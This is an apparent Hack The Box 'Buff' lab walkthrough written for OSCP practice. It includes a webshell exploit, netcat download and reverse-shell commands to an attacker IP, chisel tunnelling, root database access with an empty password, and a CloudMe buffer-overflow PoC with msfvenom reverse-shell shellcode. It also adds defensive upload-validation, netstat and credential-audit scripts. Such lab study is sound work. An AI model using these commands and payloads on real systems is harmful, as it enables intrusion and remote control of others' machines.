In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Mon Oct 23 09:58:25 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/buff/results/10.10.10.198/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/buff/results/10.10.10.198/scans/xml/_quick_tcp_nmap.xml 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up, received user-set (0.41s latency).
Scanned at 2023-10-23 09:58:32 EDT for 55s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 09:59:27 2023 -- 1 IP address (1 host up) scanned in 62.21 seconds
nikto output
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.198
+ Target Hostname: 10.10.10.198
+ Target Port: 8080
+ Start Time: 2023-10-23 09:59:31 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
+ /: Retrieved x-powered-by header: PHP/7.4.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ OpenSSL/1.1.1g appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.4.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.4.43 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /README.md: Readme Found.
+ 9169 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2023-10-23 11:12:28 (GMT-4) (4377 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
On the contact page we see that the site is built on Gym Management System 1.0.
Searching for it with searchsploit:
╭─kali@kali ~/HTB/buff
╰─$ searchsploit Gym Management system
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/HTB/buff
get the exploit
╭─kali@kali ~/HTB/buff
╰─$ searchsploit -m php/webapps/48506.py
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/HTB/buff/48506.py
╭─kali@kali ~/HTB/buff
╰─$
We get a shell straight away. Every response from the webshell begins with the bytes �PNG: the exploit uploads its PHP file with a PNG header prepended so that it passes the application's image check, and that header is echoed back on each command.
╭─kali@kali ~/HTB/buff
╰─$ python2.7 ./48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
whoami
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
C:\xampp\htdocs\gym\upload> whoami /all
�PNG
�
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\xampp\htdocs\gym\upload>
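The �PNG bytes in front of every webshell response are the core of the initial foothold: the uploaded file is PHP with a PNG header glued on, and an upload filter that only sniffs magic bytes accepts it. The following is an added example, not code from this writeup or from Gym Management System: the weak magic-only check beside a stricter one that ties the magic to a single allow-listed extension and refuses anything containing a PHP open tag. The sample files are constructed.

```python
import re

# Magic bytes for the image types an upload form might accept
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# A PHP open tag anywhere in the body ("<?php" or "<?=")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def magic_only_check(data: bytes) -> bool:
    """Weak validator: accepts anything whose first bytes look like an image.
    A PNG-prefixed PHP file passes this check."""
    return any(data.startswith(m) for m in MAGIC.values())


def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Stricter validator. Returns (accepted, reason).

    - exactly one extension, so 'shell.php.png' is rejected outright
    - the extension must be on the allow-list
    - the magic bytes must match *that* extension, not just any image
    - no PHP open tag anywhere in the body
    """
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    if PHP_TAG.search(data):
        return False, "PHP open tag found in body"
    return True, "ok"


# Constructed samples (not files taken from the box)
DISGUISED = MAGIC["png"] + b"<?php /* stand-in for a webshell */ ?>"
LEGIT_PNG = MAGIC["png"] + b"\x00\x00\x00\rIHDR" + bytes(16)

if __name__ == "__main__":
    for name, data in [("shell.php.png", DISGUISED),
                       ("logo.png", DISGUISED),
                       ("logo.png", LEGIT_PNG)]:
        print(name, "magic-only:", magic_only_check(data),
              "hardened:", hardened_check(name, data))
```

Validation alone is not the fix: the upload directory should never execute scripts (for mod_php, `php_admin_flag engine off` on that directory), and uploads should be stored under a server-generated name rather than the one the client supplied.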
sysinfo
C:\xampp\htdocs\gym\upload> systeminfo
�PNG
�
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 23/10/2023, 13:35:36
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,650 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,896 MB
Virtual Memory: In Use: 1,903 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::58ce:bbdf:be3e:33f4
[03]: dead:beef::5501:3e4a:11:be9c
[04]: dead:beef::58ce:bbdf:be3e:33f4
[05]: dead:beef::ee
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\xampp\htdocs\gym\upload>
We feed the systeminfo output to Windows Exploit Suggester. No hotfixes are installed, so every bulletin in the database comes back as a candidate.
╭─kali@kali ~/HTB/buff/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
....
We pull nc.exe onto the box with curl and use it for a proper reverse shell. The first curl, without -o, just dumps the binary to the terminal (hence the MZ garbage below); the second, with -o, saves it to disk.
C:\xampp\htdocs\gym\upload> curl http://10.10.14.4:90/nc.exe nc.exe
�PNG
�
MZ����@��� �!�L�!This program cannot be run in DOS mode.
$PEd���sN�/
f,
@9� �0��
C:\xampp\htdocs\gym\upload> curl http://10.10.14.4:90/nc.exe -o nc.exe
�PNG
�
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.4 443 -e cmd.exe
╭─kali@kali ~/HTB/buff
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.198] 51035
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>cd ../
cd ../
C:\xampp\htdocs\gym>
Check which services are listening on localhost only (these were invisible to the external nmap scan):
C:\xampp\htdocs\gym\upload>netstat -ano | findstr 127.0.0.1
netstat -ano | findstr 127.0.0.1
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8832
UDP 127.0.0.1:1900 *:* 5420
UDP 127.0.0.1:56351 *:* 5420
UDP 127.0.0.1:58842 *:* 3000
C:\xampp\htdocs\gym\upload>
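The netstat listing is the first view of services that the external scan could not see: MariaDB on 3306 (and later CloudMe on 8888) are bound to 127.0.0.1 only. As an added example that is not part of this writeup, here is a small parser for `netstat -ano` output that separates listening sockets from everything else and can restrict the result to loopback-only binds; the sample text reuses the rows above plus a few constructed lines (the 8080, [::1] and 5353 rows) to exercise IPv6 addresses and the UDP layout.

```python
# Parser for Windows `netstat -ano` output (constructed sample below).
LOOPBACK = {"127.0.0.1", "::1"}

NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2180
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8536
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       3560
  TCP    127.0.0.1:49723        127.0.0.1:3306         TIME_WAIT       0
  TCP    [::1]:3306             [::]:0                 LISTENING       8536
  UDP    127.0.0.1:1900         *:*                                    5632
  UDP    0.0.0.0:5353           *:*                                    1432
"""


def split_addr(addr: str):
    """'127.0.0.1:3306' -> ('127.0.0.1', 3306); '[::1]:3306' -> ('::1', 3306); '*:*' -> ('*', None)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> list[dict]:
    records = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue  # header, blank or unrelated line
        proto = fields[0]
        lhost, lport = split_addr(fields[1])
        fhost, fport = split_addr(fields[2])
        if proto == "TCP":
            state, pid = fields[3], int(fields[4])
        else:
            state, pid = "", int(fields[3])  # UDP rows have no State column
        records.append({"proto": proto, "lhost": lhost, "lport": lport,
                        "fhost": fhost, "fport": fport, "state": state, "pid": pid})
    return records


def listeners(records: list[dict], loopback_only: bool = False) -> list[tuple]:
    """Sockets that accept input: TCP in LISTENING state, or any bound UDP socket.
    Returns sorted, de-duplicated (proto, port, pid) tuples."""
    out = set()
    for r in records:
        if r["proto"] == "TCP" and r["state"] != "LISTENING":
            continue
        if loopback_only and r["lhost"] not in LOOPBACK:
            continue
        out.add((r["proto"], r["lport"], r["pid"]))
    return sorted(out)


if __name__ == "__main__":
    recs = parse_netstat(NETSTAT_SAMPLE)
    print("all listeners:      ", listeners(recs))
    print("loopback-only binds:", listeners(recs, loopback_only=True))
```

The loopback-only list is what an asset inventory built purely from external scans misses; for a defender, those entries (together with the owning PID from tasklist) are the ones to reconcile against the patch list, since an attacker with a foothold reaches them as easily as the public port.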
To reach it from Kali we can port-forward with chisel.
First add a socks5 entry to /etc/proxychains.conf:
GNU nano 7.2 /etc/proxychains.conf
#socks5 127.0.0.1 9050
socks5 127.0.0.1 1080
On the Kali machine, start the chisel server with reverse tunnelling enabled:
╭─kali@kali ~/HTB/buff
╰─$ sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
2023/10/25 01:10:24 server: Reverse tunnelling enabled
2023/10/25 01:10:24 server: Fingerprint uItK4jDKzhzI3g3OpCI74twX3IzAJFdlcyt2RghqELk=
2023/10/25 01:10:24 server: Listening on http://0.0.0.0:8000
On the Windows client, connect back and reverse-forward local port 3306:
C:\xampp\htdocs\gym\upload>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:3306:localhost:3306
.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:3306:localhost:3306
Reference for the chisel setup: https://medium.com/@n3nu/how-to-pivot-using-chisel-e59b1987e252
Next we look for the database username and password in the web app's include directory:
C:\xampp\htdocs\gym>cd include
cd include
C:\xampp\htdocs\gym\include>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\include
16/06/2020 18:50 <DIR> .
16/06/2020 18:50 <DIR> ..
16/06/2020 16:31 134 db_connect.php
16/06/2020 16:31 6,700 functions.php
16/06/2020 16:31 453 logout.php
16/06/2020 16:31 595 process_login.php
16/06/2020 16:31 412 psl-config.php
16/06/2020 16:31 2,997 register.inc.php
6 File(s) 11,291 bytes
2 Dir(s) 8,493,277,184 bytes free
C:\xampp\htdocs\gym\include>type db_connect.php
type db_connect.php
<?php
include_once 'psl-config.php'; // As functions.php is not included
$mysqli = new mysqli("localhost", "root", "", "table");
?>
C:\xampp\htdocs\gym\include>
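db_connect.php is the whole problem in one line: the application talks to MariaDB as root with an empty password, so any code execution in the web app also hands over the database. The following is an added example, not code from this writeup or from the application, of a small audit script that scans PHP source for database connections made as root, with an empty password, or with a hard-coded literal password. The argument parsing is deliberately simple (a regex, no nested parentheses), the db_connect.php text is the file shown above, and the PDO sample is constructed.

```python
import re

# new mysqli(host, user, pass, db) / mysqli_connect(host, user, pass, ...) / new PDO(dsn, user, pass)
# all carry the user as the 2nd argument and the password as the 3rd.
CALL_RE = re.compile(r"(new\s+mysqli|new\s+PDO|mysqli_connect)\s*\(([^)]*)\)", re.IGNORECASE)

# The file found on the box, reproduced from the listing above
DB_CONNECT_PHP = """<?php
include_once 'psl-config.php'; // As functions.php is not included
$mysqli = new mysqli("localhost", "root", "", "table");
?>"""

# Constructed counter-example: dedicated user, password from the environment
PDO_SAMPLE = """<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'app_user', getenv('DB_PASS'));
"""


def is_literal(arg: str) -> bool:
    """True if the argument is a quoted string literal."""
    return len(arg) >= 2 and arg[0] == arg[-1] and arg[0] in "\"'"


def audit_php(source: str, path: str = "<input>") -> list[tuple[str, int, str]]:
    """Return (path, line, finding) tuples for risky database connections."""
    findings = []
    for m in CALL_RE.finditer(source):
        args = [a.strip() for a in m.group(2).split(",")]
        if len(args) < 3:
            continue  # not enough arguments to carry a password
        user, password = args[1], args[2]
        line = source.count("\n", 0, m.start()) + 1
        if is_literal(password) and password[1:-1] == "":
            findings.append((path, line, "empty database password"))
        elif is_literal(password):
            findings.append((path, line, "hard-coded database password"))
        if is_literal(user) and user[1:-1].lower() == "root":
            findings.append((path, line, "application connects as root"))
    return findings


if __name__ == "__main__":
    for path, src in (("db_connect.php", DB_CONNECT_PHP), ("ok.php", PDO_SAMPLE)):
        for finding in audit_php(src, path) or [(path, 0, "clean")]:
            print(*finding)
```

Run over a real tree, the script would walk `*.php` files under the web root; the point of the check is that an application should use its own least-privilege database account with a real password, and that the root account on 3306 (empty password for localhost, 127.0.0.1 and ::1, as the mysql.user listing further down shows) is reachable by anyone who can run code on the host.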
The application connects as root with an empty password, so we try the same through the forwarded port:
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ proxychains mysql -u root -h 10.10.14.4 -P 3306
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.14.4:3306 ... OK
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 19
Server version: 10.4.11-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Looking through the databases, there is nothing useful (the first two queries are MSSQL syntax and fail on MariaDB):
MariaDB [(none)]> SELECT name, type_desc FROM sys.server_principals WHERE type IN ('U', 'G', 'S');
ERROR 1146 (42S02): Table 'sys.server_principals' doesn't exist
MariaDB [(none)]> SELECT name FROM sys.databases;
ERROR 1146 (42S02): Table 'sys.databases' doesn't exist
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| phpmyadmin |
| table |
| test |
+--------------------+
6 rows in set (1.195 sec)
MariaDB [(none)]>
MariaDB [(none)]> USE mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]>
MariaDB [mysql]> SELECT user, host, password FROM user;
+------+-----------+----------+
| User | Host | Password |
+------+-----------+----------+
| root | localhost | |
| root | 127.0.0.1 | |
| root | ::1 | |
| pma | localhost | |
+------+-----------+----------+
4 rows in set (1.226 sec)
MariaDB [mysql]> use table;
Database changed
MariaDB [table]> SELECT user, host, password FROM user;
ERROR 1146 (42S02): Table 'table.user' doesn't exist
MariaDB [table]> show TABLES;
Empty set (1.199 sec)
MariaDB [table]> use test
Database changed
MariaDB [test]> show TABLES;
Empty set (1.118 sec)
MariaDB [test]> use phpmyadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [phpmyadmin]> show TABLES;
+------------------------+
| Tables_in_phpmyadmin |
+------------------------+
| pma__bookmark |
| pma__central_columns |
| pma__column_info |
| pma__designer_settings |
| pma__export_templates |
| pma__favorite |
| pma__history |
| pma__navigationhiding |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__savedsearches |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
| pma__usergroups |
| pma__users |
+------------------------+
19 rows in set (1.026 sec)
MariaDB [phpmyadmin]> SELECT * FROM pma__users;
Empty set (1.025 sec)
MariaDB [phpmyadmin]>
After a while we notice that port 8888 is also listening on localhost:
C:\xampp\htdocs\gym\include>netstat -ano | findstr 127.0.0.1
netstat -ano | findstr 127.0.0.1
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8536
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 3560
TCP 127.0.0.1:49723 127.0.0.1:3306 TIME_WAIT 0
UDP 127.0.0.1:1900 *:* 5632
UDP 127.0.0.1:55800 *:* 5632
UDP 127.0.0.1:58805 *:* 3024
We add a second reverse port forward for it:
C:\xampp\htdocs\gym\upload>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:8888:localhost:8888
.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:8888:localhost:8888
2023/10/25 11:01:38 client: Connecting to ws://10.10.14.4:8000
2023/10/25 11:01:41 client: Connected (Latency 339.7797ms)
In shaun's Downloads folder there is an installer called CloudMe_1112.exe; CloudMe Sync listens on TCP 8888 by default, which explains the new listener.
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 9,812,205,568 bytes free
C:\Users\shaun\Downloads>
There is an exploit on Exploit-DB: https://www.exploit-db.com/exploits/48389
It also shows up in searchsploit:
╰─$ searchsploit CloudMe
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
------------------------------------------------------------------------- ---------------------------------
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ cd ~/HTB/buff
╭─kali@kali ~/HTB/buff
╰─$ searchsploit -m windows/remote/48389.py
Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
URL: https://www.exploit-db.com/exploits/48389
Path: /usr/share/exploitdb/exploits/windows/remote/48389.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/HTB/buff/48389.py
╭─kali@kali ~/HTB/buff
╰─$ nano 48389.py
╭─kali@kali ~/HTB/buff
╰─$
The PoC only launches calc.exe, so we generate a reverse-shell payload with msfvenom (same architecture and bad characters as the script's comment) to replace the payload shown in the script:
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 -a x86 --platform windows LPORT=4444 EXITFUNC=thread -b '\x00\x0A\x0D' -f python > payload.py
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1745 bytes
╭─kali@kali ~/HTB/buff
╰─$ cat payload.py
buf = b""
buf += b"\xdb\xdf\xbf\xb7\xad\xa1\xe7\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x52\x31\x7b\x17\x83\xc3\x04\x03\xcc"
buf += b"\xbe\x43\x12\xce\x29\x01\xdd\x2e\xaa\x66\x57\xcb"
buf += b"\x9b\xa6\x03\x98\x8c\x16\x47\xcc\x20\xdc\x05\xe4"
buf += b"\xb3\x90\x81\x0b\x73\x1e\xf4\x22\x84\x33\xc4\x25"
buf += b"\x06\x4e\x19\x85\x37\x81\x6c\xc4\x70\xfc\x9d\x94"
buf += b"\x29\x8a\x30\x08\x5d\xc6\x88\xa3\x2d\xc6\x88\x50"
buf += b"\xe5\xe9\xb9\xc7\x7d\xb0\x19\xe6\x52\xc8\x13\xf0"
buf += b"\xb7\xf5\xea\x8b\x0c\x81\xec\x5d\x5d\x6a\x42\xa0"
buf += b"\x51\x99\x9a\xe5\x56\x42\xe9\x1f\xa5\xff\xea\xe4"
buf += b"\xd7\xdb\x7f\xfe\x70\xaf\xd8\xda\x81\x7c\xbe\xa9"
buf += b"\x8e\xc9\xb4\xf5\x92\xcc\x19\x8e\xaf\x45\x9c\x40"
buf += b"\x26\x1d\xbb\x44\x62\xc5\xa2\xdd\xce\xa8\xdb\x3d"
buf += b"\xb1\x15\x7e\x36\x5c\x41\xf3\x15\x09\xa6\x3e\xa5"
buf += b"\xc9\xa0\x49\xd6\xfb\x6f\xe2\x70\xb0\xf8\x2c\x87"
buf += b"\xb7\xd2\x89\x17\x46\xdd\xe9\x3e\x8d\x89\xb9\x28"
buf += b"\x24\xb2\x51\xa8\xc9\x67\xf5\xf8\x65\xd8\xb6\xa8"
buf += b"\xc5\x88\x5e\xa2\xc9\xf7\x7f\xcd\x03\x90\xea\x34"
buf += b"\xc4\x95\xe0\x38\x10\xc2\xf6\x44\x09\x4e\x7e\xa2"
buf += b"\x43\x7e\xd6\x7d\xfc\xe7\x73\xf5\x9d\xe8\xa9\x70"
buf += b"\x9d\x63\x5e\x85\x50\x84\x2b\x95\x05\x64\x66\xc7"
